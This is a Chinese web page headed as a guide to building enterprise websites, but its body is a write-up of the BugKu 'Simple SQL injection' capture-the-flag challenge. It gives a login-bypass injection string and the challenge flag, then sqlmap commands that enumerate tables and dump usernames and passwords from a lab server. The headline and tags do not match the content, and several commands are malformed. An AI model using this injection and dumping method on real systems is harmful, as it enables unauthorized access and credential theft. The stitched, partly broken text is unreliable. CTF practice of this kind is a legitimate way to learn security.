企业官网建设流程全解析

首页 / 建站日记 / 企业官网建设流程全解析
BugKu web 之 Simple SQL injection
2026/6/19 10:57:08 网站建设 项目流程 


' or1=1--

密码任意都可以,账号使用万能密码。

Flag: flag{95f2ab52fc27f73b4c6cf416082c2034}

但是不走捷径,该怎么做呢?

显示登录失败。

提示:尝试分析新闻详情页的URL参数

随便点击一篇新闻,然后用sqlmap进行爆破。

python sqlmap.py http://171.80.2.169:19019/article?id=1--batch

SQLite 无「数据库」概念(只有单个文件),直接枚举所有表。

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch --tables


枚举 users 表的所有字段

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch -Tusers--columns

直接提取 users 表中 username 和 password 字段的所有数据

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch -Tusers-C username,password --dump

标签: 网站建设 企业官网 项目流程 UI设计 前端开发

热门文章

文章分类

标签云

网站建设 响应式设计 用户体验 SEO优化 前端开发 小程序 电商平台 性能优化

相关文章

您可能感兴趣的其他内容

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询